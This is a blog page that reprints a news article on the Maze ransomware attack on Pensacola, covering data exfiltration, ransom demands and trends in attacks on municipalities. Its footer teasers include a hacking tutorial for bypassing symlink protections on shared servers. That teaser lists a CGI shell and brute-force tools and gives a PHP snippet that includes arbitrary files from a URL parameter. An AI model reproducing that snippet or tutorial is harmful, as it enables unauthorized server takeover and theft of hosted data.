Skip to main content

Maze Ransomware Behind Pensacola Attack, Data Breach Looms

Maze Ransomware


Maze exfiltrates data as well as locks down systems. Officials said they don’t know yet whether any residents’ personal information has been breached. 
The Maze ransomware is likely the culprit behind the recently reported cyberattack on Pensacola, Fla. that occurred earlier this week, which downed systems citywide.
In an email sent to county commissioners, IT administrators said that the Florida Department of Law Enforcement said that the Pensacola attack was indeed ransomware, and Maze operators quickly took responsibility for the incident, saying that they are demanding $1 million in ransom.
As of Wednesday, Pensacola’s systems were slowly coming back online, as IT staff cleared the network of malware, officials told the Pensacola News Journal (online payments for Pensacola Energy and city sanitation customers remained down). It’s unclear whether the city is paying the ransom, but officials did say they don’t know yet whether any residents’ personal information has been breached.
The data breach fears are particularly relevant given that Maze has a quirk not found in most ransomware: In addition to encrypting files and offering the decryption key in exchange for a ransom payment, it also automatically copies all affected files to the malicious operators’ servers, according to researchers.
“For Maze’s victims, the fact that the attackers have exfiltrated the data means the incident is a data breach as well as a malware infection,” explained Duo Security, in a posting on the Florida incident on Wednesday. “This changes the incident response playbook, as the IT department will have to loop in legal and other departments to consider what additional steps will be necessary to recover from the infection.”
For instance, some organizations and municipalities have refused to pay ransoms, in an effort to cut off the cybercriminals’ revenue streams and avoid becoming repeat victims. The decision to pay or not to pay typically comes down to whether it’s possible to restore the data from backups, and weighing cost factors, such as the cost of downtime and cleanup efforts.
“With Maze, there is the prospect of potentially sensitive information being exposed—such as personally identifiable information, customer lists and intellectual property—if the ransom isn’t paid. Even if the organization can afford to rebuild and restore on its own, they may feel the pressure to pay just to keep the files out of public domain,” according to Duo Security researchers.
Maze ransomware, a variant of ChaCha ransomware, was initially found by Malwarebytes security researcher Jérôme Segura in May. He observed the previously unknown ransomware being distributed using the Fallout exploit kit, via a fake site camouflaged as a legitimate cryptocurrency exchange app. Since then, it has cropped up in a number of attacks, including one on security company Allied Universal last month.
According to reports, the crooks in that attack asked for a $2.3 million ransom in exchange for the decryption key and a promise not to release the company’s data. When Allied Universal missed the deadline to pay up, the Maze group published 700 MB worth of data (only 10 percent of what the crooks claimed to have stolen).
Also in November, a new threat actor was seen impersonating the U.S. Postal Service (USPS) and other government agencies to deliver and install both Maze and backdoor malware to various organizations in Germany, Italy and the United States, according to Proofpoint.
Duo Security noted that it’s a “worrying possibility” that the Pensacola attack is linked to the Allied Universal debacle.
“Allied Universal has offices in Pensacola, and if there was any city-related information in its files, the group behind the infection could have potentially used that information against the city [in a phishing campaign,” according to Duo Security. “Another possibility is that if Allied provided security services to the city, the infection could have piggybacked on an Allied employee to move from one network to another. This turns the ransomware attack into data breach using a third-party supplier.”
This brings up the possibility that attackers are crafting secondary campaigns using information stolen from the first one – potentially setting up a scenario of continuously cascading follow-on attacks.
“The evolution of ransomware infections being a precursor to attacks on other organizations is a highly concerning one,” Duo Security noted. “[This] highlights how a security incident at one organization puts others at risk.”
For its part, in an interview with Bleeping Computer, the Maze group taking responsibility for Pensacola said that it doesn’t use the data for any purpose other than extortion. “We are neither espionage group nor any other type of APT,” the criminal group told the publication. The group also said that it’s not interested in “socially vital objects” such as 911 and medical care centers, and that it attempts to avoid encrypting essential public-safety services.
According to Kaspersky security experts, 2019 has seen a significant spike of ransomware attacks on municipalities. In a report this week, the firm said that municipal ransomware is “the story of the year,” with at least 174 municipal institutions and more than 3,000 subset divisions having been targeted in 2019. This represents a 60 percent increase from last year.
In analyzing publicly available information, Kaspersky also found that ransom demands have varied greatly with highs reaching up to $5.3 million to $1 million on average.
The firm noted that while these targets might be less capable of paying a large ransom, they are more likely to agree to cybercriminals’ demands, given that blocking any municipal services directly affects the welfare of citizens in financial losses as well as other significant and sensitive consequences.
“One must always keep in mind that paying extortionists is a short-term solution which only encourages criminals and keeps them funded to quite possibly repeat the same acts,” said Fedor Sinitsyn, a security researcher at Kaspersky, in a statement. “In addition, once a city has been attacked, the whole infrastructure is compromised and requires an incident investigation and a thorough audit.”
While Maze appears to be an up-and-coming threat, the top ransomware families Ryuk, Purga and Stop topped Kasperksy’s list of municipal malware. All of them have unique attack characteristics that cities should be aware of, experts report.
“Ryuk…[has a] distribution model [that] usually involves delivery via backdoor malware which spreads by the means of phishing with a malicious attachment disguised as a financial document,” according to the report. “Purga malware has been recognized since 2016, yet only recently municipalities have been discovered to fall victims to this trojan, having various attack vectors from phishing to brute-force attacks. Stop…propagates by hiding inside software installers.”
Ryuk is particularly notorious. It’s a ransomware strain distributed by the Russian-speaking Wizard Spider financial crime syndicate, first spotted in August 2018. Since then, it has been involved in several high-profile attacks, such as a coordinated, targeted ransomware cyberattack on 23 Texas local and state entities in August.
Despite the fact that the decision to pay the ransom has several dimensions that will be unique to each victim (including, now, the threat of a data breach), some researchers urge those affected to consider paying a public disservice.
“As long as we as a society continue paying ransoms, these attacks will continue,” Cody Brocious, hacker and head of Hacker Education at HackerOne, via email. “Maintain regular (offline!) backups, keep your systems up to date, and don’t pay ransoms, if you do happen to get hit. At this point, it’s akin to choosing not to get a flu shot; sure, if you’re healthy then you’re not likely to die from the flu, but you may transmit it to someone who will. Giving in to these criminals is acting against the public good, which just ends up protecting organizations from the consequences of not taking their data seriously.”

Comments

Popular posts from this blog

10 Best Forum Software For Webmasters

10 Best Forum Software For Webmasters Do you want to create your online discussion forum or online community where people can discuss about their favorite topics? In this article, you can see 10 best forum software (scripts for setting up discussion forums) that can be used free of cost. Although some scripts are paid but rest of these forum scripts are free to use.You only need to buy hosting space and domain name for your website and after then you can install any of these forum scripts to start your own discussion forums on the internet. Online discussion forums generate huge page views because thousands of people want to join online discussion forums to ask questions or share knowledge. Some of online marketers join forums to discuss about their products with community members. You don't need to acquire any kind of technical skill to run a professional discussion forums because these days, almost all web hosting providers offer one click script installer which h...

|Bypass Symlink on 2013 Server With Different .htaccess and Methods by Sen Haxor |

Hi, Guys,  Please a wonderfull tutorial provided bt Sem;\  Today I gonna Explain how to bypass Symlink on 2013 Server With Different .htaccess and Methods. So let's Get Started :) Note: This method is not applicable for Godaddy, Bluehost, Hostgator and Hostmonstor Servers. For This First You Need the Following Files : 1 -> Sen Haxor CGI Shell 2 -> sen.zip 3 -> passwd-bypass.php 4 -> Turbo Brute force Cpanel 5 - > Port.py First Before Starting to symlink we need to create php.ini and ini.php to Disable Safe mode and Disabled Functions on the server . Use the Following Code : Make a php.ini with the following code safe_mode=Off And ini.php with <? echo ini_get("safe_mode"); echo ini_get("open_basedir"); include($_GET["file"]); ini_restore("safe_mode"); ini_restore("open_basedir"); echo ini_get("safe_mode"); echo...

How to Hack WhatsApp using just a GIF

A picture is worth a thousand words, but a GIF is worth a thousand pictures. Today, the short looping clips, GIFs are everywhere—on your social media, on your message boards, on your chats, helping users perfectly express their emotions, making people laugh, and reliving a highlight. But what if an innocent-looking GIF greeting with Good morning, Happy Birthday, or Merry Christmas message hacks your smartphone? Well, not a theoretical idea anymore. WhatsApp has recently patched a critical security vulnerability in its app for Android, which remained unpatched for at least 3 months after being discovered, and if exploited, could have allowed remote hackers to compromise Android devices and potentially steal files and chat messages. WhatsApp Remote Code Execution Vulnerability The vulnerability, tracked as  CVE-2019-11932 , is a double-free memory corruption bug that doesn't actually reside in the WhatsApp code itself, but in an open-source GIF image parsing library that What...